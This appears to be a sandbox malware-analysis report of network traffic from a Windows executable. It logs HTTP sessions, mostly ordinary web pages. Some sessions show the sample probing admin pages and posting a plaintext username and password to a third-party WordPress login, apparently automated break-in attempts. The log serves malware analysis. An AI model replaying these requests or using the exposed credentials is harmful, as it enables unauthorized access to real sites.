                                                                                                                                                                                                    2023-11-26 05:59:41 UTC701INData Raw: 38 64 36 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 27
                                                                                                                                                                                                    Data Ascii: 8d6d<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <meta name='robots' content='noindex, nofollow'
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC14994INData Raw: 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 2f 22 2c 22 6e 61 6d 65 22 3a 22 53 74 61 67 69 6e 67 20 66 6f 72 20 4d 79 44 69 72 65 63 74 4c 65 6e 64 65 72 2e 63 6f 6d 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 44 69 72 65 63 74 20 4c 65 6e 64 65 72 73 2c 20 4c 4c 43 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72
                                                                                                                                                                                                    Data Ascii: ph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://mydirectlender.com/#website","url":"https://mydirectlender.com/","name":"Staging for MyDirectLender.com","description":"Direct Lenders, LLC","publisher":{"@id":"https://mydir
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC16384INData Raw: 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6d 69 64 6e 69 67 68 74 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6d 69 64 6e 69 67 68 74 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 73 6d 61 6c 6c 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 73 6d 61 6c 6c 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6d 65 64 69 75 6d 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e
                                                                                                                                                                                                    Data Ascii: r(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{fon
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC4134INData Raw: 3c 2f 64 69 76 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 74 79 78 2d 73 69 64 65 62 61 72 20 63 6f 6c 2d 6d 64 2d 33 20 63 6f 6c 2d 31 32 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 73 65 61 72 63 68 2d 31 22 20 63 6c 61 73 73 3d 22 77 69 64 67 65 74 20 77 69 64 67 65 74 5f 73 65 61 72 63 68 22 3e 3c 66 6f 72 6d 20 72 6f 6c 65 3d 22 73 65 61 72 63 68 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 69 64 3d 22 73 65 61 72 63 68 66 6f 72 6d 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 2f 22 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09
                                                                                                                                                                                                    Data Ascii: </div> <div class="styx-sidebar col-md-3 col-12"> <div id="search-1" class="widget widget_search"><form role="search" method="get" id="searchform" class="searchform" action="https://mydirectlender.com/"><div>
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    289192.168.2.462841104.26.7.374436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC206OUTGET /domain_profile.cfm?d=robinsonland.com HTTP/1.1
                                                                                                                                                                                                    Host: www.hugedomains.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC806INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 0d 0a 76 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 73 69 74 65 5f 76 65 72 73 69 6f 6e 5f 70 68 61 73 65 3d 31 30 38 3b 20 65 78 70 69 72 65 73 3d 57 65 64 2c 20 32 30 2d 4e 6f 76 2d 32 30 32 34 20 30 35 3a 35 39 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closecache-control: privatevary: Accept-Encodingset-cookie: site_version_phase=108; expires=Wed, 20-Nov-2024 05:59:
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC563INData Raw: 39 32 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 63 6f 6f 6b 69 65 79 65 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 63 6f 6f 6b 69 65 79 65 73 2e 63 6f 6d 2f 63 6c 69 65 6e 74 5f 64 61 74 61 2f 65 37 31 62 63 35 33 66 31 63 62 38 38 36 36 36 64 31 36 30 63 31 65 32 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 74
                                                                                                                                                                                                    Data Ascii: 925<!DOCTYPE html><html lang="en"><head><script id="cookieyes" type="text/javascript" src="https://cdn-cookieyes.com/client_data/e71bc53f1cb88666d160c1e2/script.js"></script><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><met
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1369INData Raw: 69 6e 2e 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 72 65 62 6f 6f 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 3f 61 61 3d 32 30 32 31 2d 30 36 2d 30 39 61 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e
                                                                                                                                                                                                    Data Ascii: in.css" /><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/reboot.min.css"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/style.css?aa=2021-06-09a"><link rel="stylesheet" href="https://static.HugeDomain
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC416INData Raw: 73 73 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 7a 79 77 36 6d 64 73 2e 63 73 73 22 3e 0a 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 37 31 31 37 33 33 39 2d 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 66 75 6e
                                                                                                                                                                                                    Data Ascii: ss?family=Noto+Sans:400,700&display=swap"><link rel="stylesheet" href="https://use.typekit.net/zyw6mds.css"><script async src="https://www.googletagmanager.com/gtag/js?id=UA-7117339-4"></script><script>window.dataLayer = window.dataLayer || [];fun
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1369INData Raw: 31 31 38 34 0d 0a 69 6d 65 6e 73 69 6f 6e 33 27 3a 20 27 73 69 74 65 76 65 72 73 69 6f 6e 27 0d 0a 7d 0d 0a 7d 29 3b 0d 0a 67 74 61 67 28 27 65 76 65 6e 74 27 2c 20 27 70 61 67 65 4c 6f 61 64 27 2c 20 7b 20 27 73 69 74 65 76 65 72 73 69 6f 6e 27 3a 20 27 48 44 76 33 27 20 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 61 20 68 72 65 66 3d 22 23 6d 61 69 6e 22 20 63 6c 61 73 73 3d 22 73 6b 69 70 2d 6d 61 69 6e 22 3e 53 6b 69 70 20 74 6f 20 6d 61 69 6e 20 63 6f 6e 74 65 6e 74 3c 2f 61 3e 0a 3c 68 65 61 64 65 72 20 69 64 3d 22 68 65 61 64 65 72 22 20 63 6c 61 73 73 3d 22 68 64 76 33 48 65 61 64 65 72 44 61 72 6b 42 6c 75 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 73 2d 6f 76 65 72 6c 61 79 2d 6d 6f 64 61
                                                                                                                                                                                                    Data Ascii: 1184imension3': 'siteversion'}});gtag('event', 'pageLoad', { 'siteversion': 'HDv3' });</script></head><body><a href="#main" class="skip-main">Skip to main content</a><header id="header" class="hdv3HeaderDarkBlue"><div class="js-overlay-moda
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1369INData Raw: 49 44 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 48 65 61 64 65 72 20 44 6f 6d 61 69 6e 20 53 65 61 72 63 68 22 3e 0a 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 76 61 6c 75 65 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 6f 6e 43 6c 69 63 6b 3d 22 68 64 76 33 48 65 61 64 65 72 53 65 61 72 63 68 53 75 62 6d 69 74 46 75 6e 63 28 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 20 22 20 73 74 79 6c 65 3d 22 6d 69 6e 2d 77 69 64 74 68 3a 39 30 70 78 3b 20 68 65 69 67 68 74 3a 33 35 70 78 3b 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 65 61 72 63 68 42 75 74 74 6f 6e 49 44 22 3e 53 65 61 72 63 68 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 76 61 6c 75 65 20 69 64 3d
                                                                                                                                                                                                    Data Ascii: ID" aria-label="Header Domain Search"><button type="submit" value class="search-btn" onClick="hdv3HeaderSearchSubmitFunc(); return false; " style="min-width:90px; height:35px;" id="hdv3HeaderSearchButtonID">Search</button><button type="button" value id=
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1369INData Raw: 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6e 64 65 78 2e 63 66 6d 22 3e 48 6f 6d 65 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 66 61 71 2e 63 66 6d 22 3e 46 41 51 73 3c 2f 62 3e 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44
                                                                                                                                                                                                    Data Ascii: "><a class="nav-link " href="https://www.HugeDomains.com/index.cfm">Home</a></li><li class="nav-item"><a class="nav-link " href="https://www.HugeDomains.com/faq.cfm">FAQs</b></a></li><li class="nav-item"><a class="nav-link " href="https://www.HugeD
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC385INData Raw: 76 3e 0a 3c 2f 6e 61 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6d 61 69 6e 20 22 3e 0a 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 64 75 63 74 2d 66 61 76 2d 77 72 61 70 70 20 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 64 65 2d 77 72 61 70 70 20 64 6e 2d 6d 6f 62 69 6c 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6c 69 64 65 2d 73 69 64 65 62 61 72 2d 62 6c 6f 63 6b 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 73 2d 62 6c 6f 63 6b 2d 69 6e 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 73 2d 62 6c 6f 63 6b 2d 69 6e 6e 65 72 2d 6e 65 77 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 73 2d 62 6c 6f 63 6b 2d 74 69 74 6c 65 20 67 72 65 65 6e 22
                                                                                                                                                                                                    Data Ascii: v></nav></header><main class="site-main "><div class="product-fav-wrapp container"><div class="side-wrapp dn-mobile"><div class="slide-sidebar-block"><div class="ss-block-inner"><div class="ss-block-inner-new"><span class="ss-block-title green"
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1369INData Raw: 37 66 66 61 0d 0a 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 2e 63 66 6d 3f 64 3d 52 6f 62 69 6e 73 6f 6e 4c 61 6e 64 26 65 3d 63 6f 6d 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 6d 2d 62 2d 30 20 6d 2d 74 2d 30 20 22 20 69 64 3d 22 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 49 44 22 20 6f 6e 43 6c 69 63 6b 3d 22 24 28 27 23 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 49 44 27 29 2e 61 64 64 43 6c 61 73 73 28 27 68 69 64 64 65 6e 41 74 4c 6f 61 64 27 29 3b 20 24 28 27 23 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 50 72 6f 63 65 49 44 27 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 68 69 64 64 65 6e 41 74 4c 6f
                                                                                                                                                                                                    Data Ascii: 7ffa<a href="https://www.HugeDomains.com/shopping_cart.cfm?d=RobinsonLand&e=com" class="btn m-b-0 m-t-0 " id="hdv3Billboard197BuyID" onClick="$('#hdv3Billboard197BuyID').addClass('hiddenAtLoad'); $('#hdv3Billboard197BuyProceID').removeClass('hiddenAtLo
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1369INData Raw: 3d 22 20 70 6c 61 63 65 2d 6f 72 64 65 72 2d 62 74 6e 20 70 61 79 6d 65 6e 74 70 61 79 2d 61 63 63 61 75 6e 74 2d 63 6f 6e 74 65 6e 74 2d 62 74 6e 20 62 74 6e 20 68 69 64 64 65 6e 41 74 4c 6f 61 64 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 20 6d 69 6e 2d 77 69 64 74 68 3a 32 37 33 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 35 70 78 3b 20 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 22 3e 50 72 6f 63 65 73 73 69 6e 67 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 31
                                                                                                                                                                                                    Data Ascii: =" place-order-btn paymentpay-accaunt-content-btn btn hiddenAtLoad" onclick="return false;" style="height:50px; margin-left:0px; min-width:273px; margin-top:0px; margin-bottom:25px; display:flex;">Processing<div class="circularJ"><div class="circularJ_1


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    290192.168.2.463148172.96.186.2064436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC330OUTPOST /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: samson.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP+Cookie+check
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://samson.pe/wp-login.php
                                                                                                                                                                                                    Content-Length: 153
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC153OUTData Raw: 6c 6f 67 3d 6a 6d 61 6c 64 6f 6e 61 64 6f 25 34 30 73 61 6d 73 6f 6e 2e 70 65 26 70 77 64 3d 37 31 32 33 73 61 6d 73 6f 6e 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 49 6e 69 63 69 61 72 2b 73 65 73 69 25 43 33 25 42 33 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 73 61 6d 73 6f 6e 2e 70 65 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=jmaldonado%40samson.pe&pwd=7123samson&rememberme=forever&wp-submit=Iniciar+sesi%C3%B3n&redirect_to=https%3A%2F%2Fsamson.pe%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC555INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 50 48 50 2f 37 2e 32 2e 33 34 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 2b 43 6f 6f 6b 69 65 2b 63 68 65 63 6b 3b 20 70 61 74 68 3d 2f 3b 20 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKConnection: closex-powered-by: PHP/7.2.34expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8set-cookie: wordpress_test_cookie=WP+Cookie+check; path=/; s
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC813INData Raw: 32 33 65 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 50 45 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 49 6e 69 63 69 61 72 20 73 65 73 69 c3 b3 6e 20 26 6c 73 61 71 75 6f 3b 20 53 61 6d 73 6f 6e 20 43 6f 6e 74 72 6f 6c 73 20 50 65 72 c3 ba 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 21
                                                                                                                                                                                                    Data Ascii: 23ec<!DOCTYPE html><html lang="es-PE"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Iniciar sesin &lsaquo; Samson Controls Per &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><!
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC8391INData Raw: 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 6f 67 69 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 61 6d 73 6f 6e 2e 70 65 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 6f 67 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 53 69 74 65 20 4b 69 74 20 62 79 20 47 6f 6f 67 6c 65 20 31 2e 31 31 34 2e 30 22 20 2f 3e 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 65 66 65 72 72 65 72 27 20 63 6f 6e 74 65 6e 74 3d 27 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 27 20 2f 3e 0a 09 09
                                                                                                                                                                                                    Data Ascii: l='stylesheet' id='login-css' href='https://samson.pe/wp-admin/css/login.min.css?ver=6.4.1' type='text/css' media='all' /><meta name="generator" content="Site Kit by Google 1.114.0" /><meta name='referrer' content='strict-origin-when-cross-origin' />
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    291192.168.2.46288672.167.58.1614436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC170OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                    Host: webstamp.ca
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
